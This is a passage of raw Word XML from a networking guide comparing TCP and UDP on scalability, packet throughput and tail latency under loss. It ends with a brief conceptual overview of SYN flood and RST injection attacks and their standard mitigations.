    <w:p w14:paraId="5992EFB7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1404"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Reliable, ordered delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7503212F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1404"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Use case: chat, notifications, live dashboards, collaborative editing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141D02E2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1404"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Latency: TCP retransmission delays during packet loss → variable latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380466DA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WebRTC (UDP-based, primarily):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEA8F5E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Peer-to-peer media streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108AB848" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Uses SRTP over UDP for media (unreliable, real-time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CC5F4C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Uses SCTP over DTLS over UDP for data channels (can be reliable or unreliable, configurable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70C8D8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Use case: video calls, screen sharing, peer-to-peer file transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D5BEF7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Latency: consistent, low (no retransmission delays for media).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570BE1EC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="5AB22DB7">
          <v:rect id="_x0000_i5022" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE6EC8D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. TCP and UDP Performance at Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0DEAEA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Connection Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F9D910" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP server handling millions of connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530934A5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Per-connection kernel state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23358545" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57466E0C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>TCB (Transmission Control Block): ~280 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F8B539" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Socket buffer (send): 16–256 KB (tunable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D3701" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Socket buffer (receive): 16–256 KB (tunable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843FF66" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>File descriptor: ~1 KB kernel overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A9C452" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="32DD5695" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Conservative: 400 bytes per idle connection (no buffers allocated until data flows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704F4EF8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Active: 50–500 KB per active connection (with buffers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D956CD1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>1 million idle TCP connections: ~400 MB kernel memory (manageable). 100,000 active TCP connections with 256 KB buffers: ~25 GB (significant).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C56FB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP "server" handling millions of "clients":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3521B8D8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>No per-client state in the kernel. One UDP socket receives from ALL clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BD1241" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15723503" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Kernel state: ONE socket, ONE receive buffer (e.g., 8 MB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59686F0F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Handles unlimited clients with fixed kernel memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16796A6B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Application must maintain per-client state in userspace (if needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF447CA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Packets Per Second (PPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1872DDB6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux kernel networking throughput (approximate):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3132"/>
        <w:gridCol w:w="1534"/>
        <w:gridCol w:w="1356"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="3B15F79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B053FB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Scenario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9274E3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TCP PPS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9B04DA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>UDP PPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="3427420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C90266" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Small packets, single core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6DDE05" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>300K–500K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EB2CED" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>500K–1M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="7D37ECE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1D271D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Small packets, multi-core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726731" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>1–3M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ED8C9B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>3–10M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="55A0E4B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891909" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>With kernel bypass (DPDK)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925F7C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>10–50M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66037F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>50–100M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1874436A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why UDP achieves higher PPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4AECAF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1406"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No per-packet state lookup (no connection table search).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3866D1BD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1406"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No ACK generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B89032B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1406"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No congestion window tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324B7BB6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1406"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No reordering buffer management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D5CEF6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1406"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Simpler packet processing path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69715EAC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 Latency Percentiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49EC3D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Under 0% packet loss:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> TCP and UDP have similar latency (both just ship packets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F8AE62" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Under 1% packet loss:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1681"/>
        <w:gridCol w:w="3680"/>
        <w:gridCol w:w="3989"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="41DD823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46D7B7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Metric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CE79D3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TCP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244E53" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="18F521A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DA7849" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>p50 latency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457AB5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Same as 0% loss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816B0F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Same as 0% loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="7C957CF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18B93F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>p99 latency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87547E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>+200ms (retransmission)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C13EDD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Same as p50 (lost packets are just gone)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="5AF8F22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E9453D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>p99.9 latency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11FFB7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>+400ms (multiple retransmissions)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8BDF0E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Same as p50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B6F9D3D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP's tail latency explodes under packet loss</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> because retransmission adds full RTTs to affected packets. UDP's tail latency is unaffected (lost data is simply absent, not delayed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EFEE6D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>This is why latency-sensitive systems (trading, gaming, real-time media) prefer UDP — consistent latency matters more than reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A8717" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="0090A518">
          <v:rect id="_x0000_i5023" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="313D5FBD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>12. Security Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E9C18" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 TCP Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0714AA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYN Flood Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B0B6B1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1407"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Attacker sends millions of SYN packets with spoofed source IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245D84BC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1407"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Server allocates state for each (TCB in SYN_RECEIVED state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9F15F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1407"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Server's SYN queue fills → can't accept legitimate connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D9185" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1407"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Mitigation: SYN cookies (encode state in the SYN-ACK's sequence number — no state allocation until handshake completes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60746425" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RST Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C32CE8F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1408"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Attacker who knows the connection's 4-tuple (src IP, src port, dst IP, dst port) and approximate sequence number can send a forged RST → connection terminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742B2C19" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1408"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Mitigation: TLS (RST doesn't close TLS session cleanly, application detects), randomized sequence numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3747A781" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP provides built-in protection against injection:</w:t>
      </w:r>
    </w:p>
